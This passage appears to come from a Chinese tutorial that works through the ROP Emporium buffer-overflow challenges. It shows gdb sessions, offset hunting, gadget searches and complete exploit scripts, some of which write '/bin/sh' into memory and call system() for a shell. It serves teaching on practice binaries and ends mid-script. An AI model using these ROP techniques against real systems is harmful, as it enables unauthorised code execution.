通常情况下，对于一个有缓冲区溢出的程序，我们通常先输入一定数量的字符填满缓冲区，然后是精心构造的 ROP 链，通过覆盖堆栈上保存的返回地址来实现函数跳转（关于缓冲区溢出请查看上一章 3.1.3栈溢出）。

第一个挑战我会尽量详细一点，因为所有挑战程序都有相似的结构，缓冲区大小都一样，我们看一下漏洞函数：

gdb-peda$ disassemble pwnme
Dump of assembler code for function pwnme:
   0x080485f6 <+0>:     push   ebp
   0x080485f7 <+1>:     mov    ebp,esp
   0x080485f9 <+3>:     sub    esp,0x28
   0x080485fc <+6>:     sub    esp,0x4
   0x080485ff <+9>:     push   0x20
   0x08048601 <+11>:    push   0x0
   0x08048603 <+13>:    lea    eax,[ebp-0x28]
   0x08048606 <+16>:    push   eax
   0x08048607 <+17>:    call   0x8048460 <memset@plt>
   0x0804860c <+22>:    add    esp,0x10
   0x0804860f <+25>:    sub    esp,0xc
   0x08048612 <+28>:    push   0x804873c
   0x08048617 <+33>:    call   0x8048420 <puts@plt>
   0x0804861c <+38>:    add    esp,0x10
   0x0804861f <+41>:    sub    esp,0xc
   0x08048622 <+44>:    push   0x80487bc
   0x08048627 <+49>:    call   0x8048420 <puts@plt>
   0x0804862c <+54>:    add    esp,0x10
   0x0804862f <+57>:    sub    esp,0xc
   0x08048632 <+60>:    push   0x8048821
   0x08048637 <+65>:    call   0x8048400 <printf@plt>
   0x0804863c <+70>:    add    esp,0x10
   0x0804863f <+73>:    mov    eax,ds:0x804a060
   0x08048644 <+78>:    sub    esp,0x4
   0x08048647 <+81>:    push   eax
   0x08048648 <+82>:    push   0x32
   0x0804864a <+84>:    lea    eax,[ebp-0x28]
   0x0804864d <+87>:    push   eax
   0x0804864e <+88>:    call   0x8048410 <fgets@plt>
   0x08048653 <+93>:    add    esp,0x10
   0x08048656 <+96>:    nop
   0x08048657 <+97>:    leave  
   0x08048658 <+98>:    ret
End of assembler dump.
gdb-peda$ disassemble ret2win
Dump of assembler code for function ret2win:
   0x08048659 <+0>:     push   ebp
   0x0804865a <+1>:     mov    ebp,esp
   0x0804865c <+3>:     sub    esp,0x8
   0x0804865f <+6>:     sub    esp,0xc
   0x08048662 <+9>:     push   0x8048824
   0x08048667 <+14>:    call   0x8048400 <printf@plt>
   0x0804866c <+19>:    add    esp,0x10
   0x0804866f <+22>:    sub    esp,0xc
   0x08048672 <+25>:    push   0x8048841
   0x08048677 <+30>:    call   0x8048430 <system@plt>
   0x0804867c <+35>:    add    esp,0x10
   0x0804867f <+38>:    nop
   0x08048680 <+39>:    leave  
   0x08048681 <+40>:    ret
End of assembler dump.

函数 pwnme() 是存在缓冲区溢出的函数，它调用 fgets() 读取任意数据，但缓冲区的大小只有 40 字节（0x0804864a <+84>: lea eax,[ebp-0x28]，0x28=40），当输入大于 40 字节的数据时，就可以覆盖掉调用函数的 ebp 和返回地址：

gdb-peda$ pattern_create 50
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA'
gdb-peda$ r
Starting program: /home/firmy/Desktop/rop_emporium/ret2win32/ret2win32
ret2win by ROP Emporium
32bits

For my first trick, I will attempt to fit 50 bytes of user input into 32 bytes of stack buffer;
What could possibly go wrong?
You there madam, may I have your input please? And don't worry about null bytes, we're using fgets!

> AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xffffd5c0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAb")
EBX: 0x0
ECX: 0xffffd5c0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAb")
EDX: 0xf7f90860 --> 0x0
ESI: 0xf7f8ee28 --> 0x1d1d30
EDI: 0x0
EBP: 0x41304141 ('AA0A')
ESP: 0xffffd5f0 --> 0xf7f80062 --> 0x41000000 ('')
EIP: 0x41414641 ('AFAA')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41414641
[------------------------------------stack-------------------------------------]
0000| 0xffffd5f0 --> 0xf7f80062 --> 0x41000000 ('')
0004| 0xffffd5f4 --> 0xffffd610 --> 0x1
0008| 0xffffd5f8 --> 0x0
0012| 0xffffd5fc --> 0xf7dd57c3 (<__libc_start_main+243>:       add    esp,0x10)
0016| 0xffffd600 --> 0xf7f8ee28 --> 0x1d1d30
0020| 0xffffd604 --> 0xf7f8ee28 --> 0x1d1d30
0024| 0xffffd608 --> 0x0
0028| 0xffffd60c --> 0xf7dd57c3 (<__libc_start_main+243>:       add    esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41414641 in ?? ()
gdb-peda$ pattern_offset $ebp
1093681473 found at offset: 40
gdb-peda$ pattern_offset $eip
1094796865 found at offset: 44

缓冲区距离 ebp 和 eip 的偏移分别为 40 和 44，这就验证了我们的假设。

通过查看程序的逻辑，虽然我们知道 .text 段中存在函数 ret2win()，但在程序执行中并没有调用到它，我们要做的就是用该函数的地址覆盖返回地址，使程序跳转到该函数中，从而打印出 flag，我们称这一类型的 ROP 为 ret2text。

还有一件重要的事情是 checksec：

gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial

这里开启了关闭了 PIE，所以 .text 的加载地址是不变的，可以直接使用 ret2win() 的地址 0x08048659。

payload 如下（注这篇文章中的paylaod我会使用多种方法来写，以展示各种工具的使用）：

$ python2 -c "print 'A'*44 + '\x59\x86\x04\x08'" | ./ret2win32
...
> Thank you! Here's your flag:ROPE{a_placeholder_32byte_flag!}

ret2win

现在是 64 位程序：

gdb-peda$ disassemble pwnme
Dump of assembler code for function pwnme:
   0x00000000004007b5 <+0>:     push   rbp
   0x00000000004007b6 <+1>:     mov    rbp,rsp
   0x00000000004007b9 <+4>:     sub    rsp,0x20
   0x00000000004007bd <+8>:     lea    rax,[rbp-0x20]
   0x00000000004007c1 <+12>:    mov    edx,0x20
   0x00000000004007c6 <+17>:    mov    esi,0x0
   0x00000000004007cb <+22>:    mov    rdi,rax
   0x00000000004007ce <+25>:    call   0x400600 <memset@plt>
   0x00000000004007d3 <+30>:    mov    edi,0x4008f8
   0x00000000004007d8 <+35>:    call   0x4005d0 <puts@plt>
   0x00000000004007dd <+40>:    mov    edi,0x400978
   0x00000000004007e2 <+45>:    call   0x4005d0 <puts@plt>
   0x00000000004007e7 <+50>:    mov    edi,0x4009dd
   0x00000000004007ec <+55>:    mov    eax,0x0
   0x00000000004007f1 <+60>:    call   0x4005f0 <printf@plt>
   0x00000000004007f6 <+65>:    mov    rdx,QWORD PTR [rip+0x200873]        # 0x601070 <stdin@@GLIBC_2.2.5>
   0x00000000004007fd <+72>:    lea    rax,[rbp-0x20]
   0x0000000000400801 <+76>:    mov    esi,0x32
   0x0000000000400806 <+81>:    mov    rdi,rax
   0x0000000000400809 <+84>:    call   0x400620 <fgets@plt>
   0x000000000040080e <+89>:    nop
   0x000000000040080f <+90>:    leave  
   0x0000000000400810 <+91>:    ret
End of assembler dump.
gdb-peda$ disassemble ret2win
Dump of assembler code for function ret2win:
   0x0000000000400811 <+0>:     push   rbp
   0x0000000000400812 <+1>:     mov    rbp,rsp
   0x0000000000400815 <+4>:     mov    edi,0x4009e0
   0x000000000040081a <+9>:     mov    eax,0x0
   0x000000000040081f <+14>:    call   0x4005f0 <printf@plt>
   0x0000000000400824 <+19>:    mov    edi,0x4009fd
   0x0000000000400829 <+24>:    call   0x4005e0 <system@plt>
   0x000000000040082e <+29>:    nop
   0x000000000040082f <+30>:    pop    rbp
   0x0000000000400830 <+31>:    ret
End of assembler dump.

首先与 32 位不同的是参数传递，64 位程序的前六个参数通过 RDI、RSI、RDX、RCX、R8 和 R9 传递。所以缓冲区大小参数通过 rdi 传递给 fgets()，大小为 32 字节。

而且由于 ret 的地址不存在，程序停在了 => 0x400810 <pwnme+91>: ret 这一步，这是因为 64 位可以使用的内存地址不能大于 0x00007fffffffffff，否则就会抛出异常。

gdb-peda$ r
Starting program: /home/firmy/Desktop/rop_emporium/ret2win/ret2win
ret2win by ROP Emporium
64bits

For my first trick, I will attempt to fit 50 bytes of user input into 32 bytes of stack buffer;
What could possibly go wrong?
You there madam, may I have your input please? And don't worry about null bytes, we're using fgets!

> AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x7fffffffe400 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAb")
RBX: 0x0
RCX: 0x1f
RDX: 0x7ffff7dd4710 --> 0x0
RSI: 0x7fffffffe400 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAb")
RDI: 0x7fffffffe401 ("AA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAb")
RBP: 0x6141414541412941 ('A)AAEAAa')
RSP: 0x7fffffffe428 ("AA0AAFAAb")
RIP: 0x400810 (<pwnme+91>:      ret)
R8 : 0x0
R9 : 0x7ffff7fb94c0 (0x00007ffff7fb94c0)
R10: 0x602260 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA\n")
R11: 0x246
R12: 0x400650 (<_start>:        xor    ebp,ebp)
R13: 0x7fffffffe510 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x400809 <pwnme+84>: call   0x400620 <fgets@plt>
   0x40080e <pwnme+89>: nop
   0x40080f <pwnme+90>: leave  
=> 0x400810 <pwnme+91>: ret
   0x400811 <ret2win>:  push   rbp
   0x400812 <ret2win+1>:        mov    rbp,rsp
   0x400815 <ret2win+4>:        mov    edi,0x4009e0
   0x40081a <ret2win+9>:        mov    eax,0x0
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe428 ("AA0AAFAAb")
0008| 0x7fffffffe430 --> 0x400062 --> 0x1f8000000000000
0016| 0x7fffffffe438 --> 0x7ffff7a41f6a (<__libc_start_main+234>:       mov    edi,eax)
0024| 0x7fffffffe440 --> 0x0
0032| 0x7fffffffe448 --> 0x7fffffffe518 --> 0x7fffffffe870 ("/home/firmy/Desktop/rop_emporium/ret2win/ret2win")
0040| 0x7fffffffe450 --> 0x100000000
0048| 0x7fffffffe458 --> 0x400746 (<main>:      push   rbp)
0056| 0x7fffffffe460 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000000000400810 in pwnme ()
gdb-peda$ pattern_offset $rbp
7007954260868540737 found at offset: 32
gdb-peda$ pattern_offset AA0AAFAAb
AA0AAFAAb found at offset: 40

re2win() 的地址为 0x0000000000400811，payload 如下：

from zio import *

payload = "A"*40 + l64(0x0000000000400811)

io = zio('./ret2win')
io.writeline(payload)
io.read()

split32

这一题也是 ret2text，但这一次，我们有的是一个 usefulFunction() 函数：

gdb-peda$ disassemble usefulFunction
Dump of assembler code for function usefulFunction:
   0x08048649 <+0>:     push   ebp
   0x0804864a <+1>:     mov    ebp,esp
   0x0804864c <+3>:     sub    esp,0x8
   0x0804864f <+6>:     sub    esp,0xc
   0x08048652 <+9>:     push   0x8048747
   0x08048657 <+14>:    call   0x8048430 <system@plt>
   0x0804865c <+19>:    add    esp,0x10
   0x0804865f <+22>:    nop
   0x08048660 <+23>:    leave  
   0x08048661 <+24>:    ret
End of assembler dump.

它调用 system() 函数，而我们要做的是给它传递一个参数，执行该参数后可以打印出 flag。

使用 radare2 中的工具 rabin2 在 .data 段中搜索字符串：

$ rabin2 -z split32
...
vaddr=0x0804a030 paddr=0x00001030 ordinal=000 sz=18 len=17 section=.data type=ascii string=/bin/cat flag.txt

我们发现存在字符串 /bin/cat flag.txt，这正是我们需要的，地址为 0x0804a030。

下面构造 payload，这里就有两种方法，一种是直接使用调用 system() 函数的地址 0x08048657，另一种是使用 system() 的 plt 地址 0x8048430，在前面的章节中我们已经知道了 plt 的延迟绑定机制（1.5.6动态链接），这里我们再回顾一下：

绑定前：

gdb-peda$ disassemble system
Dump of assembler code for function system@plt:
   0x08048430 <+0>:     jmp    DWORD PTR ds:0x804a018
   0x08048436 <+6>:     push   0x18
   0x0804843b <+11>:    jmp    0x80483f0
gdb-peda$ x/5x 0x804a018  
0x804a018:      0x08048436      0x08048446      0x08048456      0x08048466
0x804a028:      0x00000000

绑定后：

gdb-peda$ disassemble system
Dump of assembler code for function system:
   0xf7df9c50 <+0>:     sub    esp,0xc
   0xf7df9c53 <+3>:     mov    eax,DWORD PTR [esp+0x10]
   0xf7df9c57 <+7>:     call   0xf7ef32cd <__x86.get_pc_thunk.dx>
   0xf7df9c5c <+12>:    add    edx,0x1951cc
   0xf7df9c62 <+18>:    test   eax,eax
   0xf7df9c64 <+20>:    je     0xf7df9c70 <system+32>
   0xf7df9c66 <+22>:    add    esp,0xc
   0xf7df9c69 <+25>:    jmp    0xf7df9700 <do_system>
   0xf7df9c6e <+30>:    xchg   ax,ax
   0xf7df9c70 <+32>:    lea    eax,[edx-0x57616]
   0xf7df9c76 <+38>:    call   0xf7df9700 <do_system>
   0xf7df9c7b <+43>:    test   eax,eax
   0xf7df9c7d <+45>:    sete   al
   0xf7df9c80 <+48>:    add    esp,0xc
   0xf7df9c83 <+51>:    movzx  eax,al
   0xf7df9c86 <+54>:    ret
End of assembler dump.
gdb-peda$ x/5x 0x08048430
0x8048430 <system@plt>: 0xa01825ff      0x18680804      0xe9000000      0xffffffb0
0x8048440 <__libc_start_main@plt>:      0xa01c25ff

其实这里讲 plt 不是很确切，因为 system 使用太频繁，在我们使用它之前，它就已经绑定了，在后面的挑战中我们会遇到没有绑定的情况。

两种 payload 如下：

$ python2 -c "print 'A'*44 + '\x57\x86\x04\x08' + '\x30\xa0\x04\x08'" | ./split32
...
> ROPE{a_placeholder_32byte_flag!}
from zio import *

payload  = "A"*44
payload += l32(0x08048430)
payload += "BBBB"
payload += l32(0x0804a030)

io = zio('./split32')
io.writeline(payload)
io.read()

注意 "BBBB" 是新的返回地址，如果函数 ret，就会执行 "BBBB" 处的指令，通常这里会放置一些 pop;pop;ret 之类的指令地址，以平衡堆栈。从 system() 函数中也能看出来，它现将 esp 减去 0xc，再取地址 esp+0x10 处的指令，也就是 "BBBB" 的后一个，即字符串的地址。因为 system() 是 libc 中的函数，所以这种方法称作 ret2libc。

split

$ rabin2 -z split
...
vaddr=0x00601060 paddr=0x00001060 ordinal=000 sz=18 len=17 section=.data type=ascii string=/bin/cat flag.txt

字符串地址在 0x00601060。

gdb-peda$ disassemble usefulFunction
Dump of assembler code for function usefulFunction:
   0x0000000000400807 <+0>:     push   rbp
   0x0000000000400808 <+1>:     mov    rbp,rsp
   0x000000000040080b <+4>:     mov    edi,0x4008ff
   0x0000000000400810 <+9>:     call   0x4005e0 <system@plt>
   0x0000000000400815 <+14>:    nop
   0x0000000000400816 <+15>:    pop    rbp
   0x0000000000400817 <+16>:    ret
End of assembler dump.

64 位程序的第一个参数通过 edi 传递，所以我们需要再调用一个 gadgets 来将字符串的地址存进 edi。

我们先找到需要的 gadgets：

gdb-peda$ ropsearch "pop rdi; ret"
Searching for ROP gadget: 'pop rdi; ret' in: binary ranges
0x00400883 : (b'5fc3')  pop rdi; ret

下面是 payload：

$ python2 -c "print 'A'*40 + '\x83\x08\x40\x00\x00\x00\x00\x00' + '\x60\x10\x60\x00\x00\x00\x00\x00' + '\x10\x08\x40\x00\x00\x00\x00\x00'" | ./split
...
> ROPE{a_placeholder_32byte_flag!}

那我们是否还可以用前面那种方法调用 system() 的 plt 地址 0x4005e0 呢：

gdb-peda$ disassemble system
Dump of assembler code for function system:
   0x00007ffff7a63010 <+0>:     test   rdi,rdi
   0x00007ffff7a63013 <+3>:     je     0x7ffff7a63020 <system+16>
   0x00007ffff7a63015 <+5>:     jmp    0x7ffff7a62a70 <do_system>
   0x00007ffff7a6301a <+10>:    nop    WORD PTR [rax+rax*1+0x0]
   0x00007ffff7a63020 <+16>:    lea    rdi,[rip+0x138fd6]        # 0x7ffff7b9bffd
   0x00007ffff7a63027 <+23>:    sub    rsp,0x8
   0x00007ffff7a6302b <+27>:    call   0x7ffff7a62a70 <do_system>
   0x00007ffff7a63030 <+32>:    test   eax,eax
   0x00007ffff7a63032 <+34>:    sete   al
   0x00007ffff7a63035 <+37>:    add    rsp,0x8
   0x00007ffff7a63039 <+41>:    movzx  eax,al
   0x00007ffff7a6303c <+44>:    ret
End of assembler dump.

依然可以，因为参数的传递没有用到栈，我们只需把地址直接更改就可以了：

from zio import *

payload  = "A"*40
payload += l64(0x00400883)
payload += l64(0x00601060)
payload += l64(0x4005e0)

io = zio('./split')
io.writeline(payload)
io.read()

callme32

这里我们要接触真正的 plt 了，根据题目提示，callme32 从共享库 libcallme32.so 中导入三个特殊的函数：

$ rabin2 -i callme32 | grep callme
ordinal=004 plt=0x080485b0 bind=GLOBAL type=FUNC name=callme_three
ordinal=005 plt=0x080485c0 bind=GLOBAL type=FUNC name=callme_one
ordinal=012 plt=0x08048620 bind=GLOBAL type=FUNC name=callme_two

我们要做的是依次调用 callme_one()、callme_two() 和 callme_three()，并且每个函数都要传入参数 1、2、3。通过调试我们能够知道函数逻辑，callme_one 用于读入加密后的 flag，然后依次调用 callme_two 和 callme_three 进行解密。

由于函数参数是放在栈上的，为了平衡堆栈，我们需要一个 pop;pop;pop;ret 的 gadgets：

$ objdump -d callme32 | grep -A 3 pop
...
 80488a8:       5b                      pop    %ebx
 80488a9:       5e                      pop    %esi
 80488aa:       5f                      pop    %edi
 80488ab:       5d                      pop    %ebp
 80488ac:       c3                      ret
 80488ad:       8d 76 00                lea    0x0(%esi),%esi
...

或者是 add esp, 8; pop; ret，反正只要能平衡，都可以：

gdb-peda$ ropsearch "add esp, 8"
Searching for ROP gadget: 'add esp, 8' in: binary ranges
0x08048576 : (b'83c4085bc3')    add esp,0x8; pop ebx; ret
0x080488c3 : (b'83c4085bc3')    add esp,0x8; pop ebx; ret

构造 payload 如下：

from zio import *

payload  = "A"*44

payload += l32(0x080485c0)
payload += l32(0x080488a9)
payload += l32(0x1) + l32(0x2) + l32(0x3)

payload += l32(0x08048620)
payload += l32(0x080488a9)
payload += l32(0x1) + l32(0x2) + l32(0x3)

payload += l32(0x080485b0)
payload += l32(0x080488a9)
payload += l32(0x1) + l32(0x2) + l32(0x3)

io = zio('./callme32')
io.writeline(payload)
io.read()

callme

64 位程序不需要平衡堆栈了，只要将参数按顺序依次放进寄存器中就可以了。

$ rabin2 -i callme | grep callme
ordinal=004 plt=0x00401810 bind=GLOBAL type=FUNC name=callme_three
ordinal=008 plt=0x00401850 bind=GLOBAL type=FUNC name=callme_one
ordinal=011 plt=0x00401870 bind=GLOBAL type=FUNC name=callme_two
gdb-peda$ ropsearch "pop rdi; pop rsi"
Searching for ROP gadget: 'pop rdi; pop rsi' in: binary ranges
0x00401ab0 : (b'5f5e5ac3')      pop rdi; pop rsi; pop rdx; ret

payload 如下：

from zio import *

payload  = "A"*40

payload += l64(0x00401ab0)
payload += l64(0x1) + l64(0x2) + l64(0x3)
payload += l64(0x00401850)

payload += l64(0x00401ab0)
payload += l64(0x1) + l64(0x2) + l64(0x3)
payload += l64(0x00401870)

payload += l64(0x00401ab0)
payload += l64(0x1) + l64(0x2) + l64(0x3)
payload += l64(0x00401810)

io = zio('./callme')
io.writeline(payload)
io.read()

write432

这一次，我们已经不能在程序中找到可以执行的语句了，但我们可以利用 gadgets 将 /bin/sh 写入到目标进程的虚拟内存空间中，如 .data 段中，再调用 system() 执行它，从而拿到 shell。要认识到一个重要的点是，ROP 只是一种任意代码执行的形式，只要我们有创意，就可以利用它来执行诸如内存读写等操作。

这种方法虽然好用，但还是要考虑我们写入地址的读写和执行权限，以及它能提供的空间是多少，我们写入的内容是否会影响到程序执行等问题。如我们接下来想把字符串写入 .data 段，我们看一下它的权限和大小等信息：

$ readelf -S write432
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  ...
  [16] .rodata           PROGBITS        080486f8 0006f8 000064 00   A  0   0  4
  [25] .data             PROGBITS        0804a028 001028 000008 00  WA  0   0  4

可以看到 .data 具有 WA，即写入（write）和分配（alloc）的权利，而 .rodata 就不能写入。

使用工具 ropgadget 可以很方便地找到我们需要的 gadgets：

$ ropgadget --binary write432 --only "mov|pop|ret"
...
0x08048670 : mov dword ptr [edi], ebp ; ret
0x080486da : pop edi ; pop ebp ; ret

另外需要注意的是，我们这里是 32 位程序，每次只能写入 4 个字节，所以要分成两次写入，还得注意字符对齐，有没有截断字符（\x00,\x0a等）之类的问题，比如这里 /bin/sh 只有七个字节，我们可以使用 /bin/sh\00 或者 /bin//sh，构造 payload 如下：

from zio import *

pop_edi_ebp = 0x080486da
mov_edi_ebp = 0x08048670

data_addr   = 0x804a028
system_plt  = 0x8048430

payload  = ""
payload += "A"*44
payload += l32(pop_edi_ebp)
payload += l32(data_addr)
payload += "/bin"
payload += l32(mov_edi_ebp)
payload += l32(pop_edi_ebp)
payload += l32(data_addr+4)
payload += "/sh\x00"
payload += l32(mov_edi_ebp)
payload += l32(system_plt)
payload += "BBBB"
payload += l32(data_addr)

io = zio('./write432')
io.writeline(payload)
io.interact()
$ python2 run.py
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(/binp,/shp0BBBB(�
write4 by ROP Emporium
32bits

Go ahead and give me the string already!
> cat flag.txt
ROPE{a_placeholder_32byte_flag!}

write4

64 位程序就可以一次性写入了。

$ ropgadget --binary write4 --only "mov|pop|ret"
...
0x0000000000400820 : mov qword ptr [r14], r15 ; ret
0x0000000000400890 : pop r14 ; pop r15 ; ret
0x0000000000400893 : pop rdi ; ret
from pwn import *

pop_r14_r15 = 0x0000000000400890
mov_r14_r15 = 0x0000000000400820
pop_rdi = 0x0000000000400893
data_addr = 0x0000000000601050
system_plt = 0x004005e0

payload  = "A"*40
payload += p64(pop_r14_r15)
payload += p64(data_addr)
payload += "/bin/sh\x00"
payload += p64(mov_r14_r15)
payload += p64(pop_rdi)
payload += p64(data_addr)
payload += p64(system_plt)

io = process('./write4')
io.recvuntil('>')
io.sendline(payload)
io.interactive()

badchars32

在这个挑战中，我们依然要将 /bin/sh 写入到进程内存中，但这一次程序在读取输入时会对敏感字符进行检查，查看函数 checkBadchars()：

gdb-peda$ disassemble checkBadchars
Dump of assembler code for function checkBadchars:
   0x08048801 <+0>:     push   ebp
   0x08048802 <+1>:     mov    ebp,esp
   0x08048804 <+3>:     sub    esp,0x10
   0x08048807 <+6>:     mov    BYTE PTR [ebp-0x10],0x62
   0x0804880b <+10>:    mov    BYTE PTR [ebp-0xf],0x69
   0x0804880f <+14>:    mov    BYTE PTR [ebp-0xe],0x63
   0x08048813 <+18>:    mov    BYTE PTR [ebp-0xd],0x2f
   0x08048817 <+22>:    mov    BYTE PTR [ebp-0xc],0x20
   0x0804881b <+26>:    mov    BYTE PTR [ebp-0xb],0x66
   0x0804881f <+30>:    mov    BYTE PTR [ebp-0xa],0x6e
   0x08048823 <+34>:    mov    BYTE PTR [ebp-0x9],0x73
   0x08048827 <+38>:    mov    DWORD PTR [ebp-0x4],0x0
   0x0804882e <+45>:    mov    DWORD PTR [ebp-0x8],0x0
   0x08048835 <+52>:    mov    DWORD PTR [ebp-0x4],0x0
   0x0804883c <+59>:    jmp    0x804887c <checkBadchars+123>
   0x0804883e <+61>:    mov    DWORD PTR [ebp-0x8],0x0
   0x08048845 <+68>:    jmp    0x8048872 <checkBadchars+113>
   0x08048847 <+70>:    mov    edx,DWORD PTR [ebp+0x8]
   0x0804884a <+73>:    mov    eax,DWORD PTR [ebp-0x4]
   0x0804884d <+76>:    add    eax,edx
   0x0804884f <+78>:    movzx  edx,BYTE PTR [eax]
   0x08048852 <+81>:    lea    ecx,[ebp-0x10]
   0x08048855 <+84>:    mov    eax,DWORD PTR [ebp-0x8]
   0x08048858 <+87>:    add    eax,ecx
   0x0804885a <+89>:    movzx  eax,BYTE PTR [eax]
   0x0804885d <+92>:    cmp    dl,al
   0x0804885f <+94>:    jne    0x804886e <checkBadchars+109>
   0x08048861 <+96>:    mov    edx,DWORD PTR [ebp+0x8]
   0x08048864 <+99>:    mov    eax,DWORD PTR [ebp-0x4]
   0x08048867 <+102>:   add    eax,edx
   0x08048869 <+104>:   mov    BYTE PTR [eax],0xeb
   0x0804886c <+107>:   jmp    0x8048878 <checkBadchars+119>
   0x0804886e <+109>:   add    DWORD PTR [ebp-0x8],0x1
   0x08048872 <+113>:   cmp    DWORD PTR [ebp-0x8],0x7
   0x08048876 <+117>:   jbe    0x8048847 <checkBadchars+70>
   0x08048878 <+119>:   add    DWORD PTR [ebp-0x4],0x1
   0x0804887c <+123>:   mov    eax,DWORD PTR [ebp-0x4]
   0x0804887f <+126>:   cmp    eax,DWORD PTR [ebp+0xc]
   0x08048882 <+129>:   jb     0x804883e <checkBadchars+61>
   0x08048884 <+131>:   nop
   0x08048885 <+132>:   leave  
   0x08048886 <+133>:   ret
End of assembler dump.

很明显，地址 0x08048807 到 0x08048823 的字符就是所谓的敏感字符。处理敏感字符在利用开发中是经常要用到的，不仅仅是要对参数进行编码，有时甚至地址也要如此。这里我们使用简单的异或操作来对字符串编码和解码。

找到 gadgets：

$ ropgadget --binary badchars32 --only "mov|pop|ret|xor"
...
0x08048893 : mov dword ptr [edi], esi ; ret
0x08048896 : pop ebx ; pop ecx ; ret
0x08048899 : pop esi ; pop edi ; ret
0x08048890 : xor byte ptr [ebx], cl ; ret

整个利用过程就是写入前编码，使用前解码，下面是 payload：

from zio import *

xor_ebx_cl  = 0x08048890
pop_ebx_ecx = 0x08048896
pop_esi_edi = 0x08048899
mov_edi_esi = 0x08048893

system_plt  = 0x080484e0
data_addr   = 0x0804a038

# encode
badchars    = [0x62, 0x69, 0x63, 0x2f, 0x20, 0x66, 0x6e, 0x73]
xor_byte    = 0x1
while(1):
    binsh = ""
    for i in "/bin/sh\x00":
        c = ord(i) ^ xor_byte
        if c in badchars:
            xor_byte += 1
            break
        else:
            binsh += chr(c)
    if len(binsh) == 8:
        break

# write
payload  = "A"*44
payload += l32(pop_esi_edi)
payload += binsh[:4]
payload += l32(data_addr)
payload += l32(mov_edi_esi)
payload += l32(pop_esi_edi)
payload += binsh[4:8]
payload += l32(data_addr + 4)
payload += l32(mov_edi_esi)

# decode
for i in range(len(binsh)):
    payload += l32(pop_ebx_ecx)
    payload += l32(data_addr + i)
    payload += l32(xor_byte)
    payload += l32(xor_ebx_cl)

# run
payload += l32(system_plt)
payload += "BBBB"
payload += l32(data_addr)

io = zio('./badchars32')
io.writeline(payload)
io.interact()

badchars

64 位程序也是一样的，注意参数传递就好了。

$ ropgadget --binary badchars --only "mov|pop|ret|xor"
...
0x0000000000400b34 : mov qword ptr [r13], r12 ; ret
0x0000000000400b3b : pop r12 ; pop r13 ; ret
0x0000000000400b40 : pop r14 ; pop r15 ; ret
0x0000000000400b30 : xor byte ptr [r15], r14b ; ret
0x0000000000400b39 : pop rdi ; ret
from pwn import *

pop_r12_r13  = 0x0000000000400b3b
mov_r13_r12  = 0x0000000000400b34
pop_r14_r15  = 0x0000000000400b40
xor_r15_r14b = 0x0000000000400b30
pop_rdi      = 0x0000000000400b39

system_plt = 0x00000000004006f0
data_addr  = 0x0000000000601000

badchars = [0x62, 0x69, 0x63, 0x2f, 0x20, 0x66, 0x6e, 0x73]
xor_byte = 0x1
while(1):
    binsh = ""
    for i in "/bin/sh\x00":
        c = ord(i) ^ xor_byte
        if c in badchars:
            xor_byte += 1
            break
        else:
            binsh += chr(c)
    if len(binsh) == 8:
        break

payload  = "A"*40
payload += p64(pop_r12_r13)
payload += binsh
payload += p64(data_addr)
payload += p64(mov_r13_r12)

for i in range(len(binsh)):
    payload += p64(pop_r14_r15)
    payload += p64(xor_byte)
    payload += p64(data_addr + i)
    payload += p64(xor_r15_r14b)

payload += p64(pop_rdi)
payload += p64(data_addr)
payload += p64(system_plt)

io = process('./badchars')
io.recvuntil('>')
io.sendline(payload)
io.interactive()

fluff32

这个练习与上面没有太大区别，难点在于我们能找到的 gadgets 不是那么直接，有一个技巧是因为我们的目的是写入字符串，那么必然需要 mov [reg], reg 这样的 gadgets，我们就从这里出发，倒推所需的 gadgets。

$ ropgadget --binary fluff32 --only "mov|pop|ret|xor|xchg"
...
0x08048693 : mov dword ptr [ecx], edx ; pop ebp ; pop ebx ; xor byte ptr [ecx], bl ; ret
0x080483e1 : pop ebx ; ret
0x08048689 : xchg edx, ecx ; pop ebp ; mov edx, 0xdefaced0 ; ret
0x0804867b : xor edx, ebx ; pop ebp ; mov edi, 0xdeadbabe ; ret
0x08048671 : xor edx, edx ; pop esi ; mov ebp, 0xcafebabe ; ret

我们看到一个这样的 mov dword ptr [ecx], edx ;，可以想到我们将地址放进 ecx，将数据放进 edx，从而将数据写入到地址中。payload 如下：

from zio import *

system_plt   = 0x08048430
data_addr    = 0x0804a028

pop_ebx      = 0x080483e1
mov_ecx_edx  = 0x08048693
xchg_edx_ecx = 0x08048689
xor_edx_ebx  = 0x0804867b
xor_edx_edx  = 0x08048671

def write_data(data, addr):
    # addr -> ecx
    payload  = l32(xor_edx_edx)
    payload += "BBBB"
    payload += l32(pop_ebx)
    payload += l32(addr)
    payload += l32(xor_edx_ebx)
    payload += "BBBB"
    payload += l32(xchg_edx_ecx)
    payload += "BBBB"

    # data -> edx
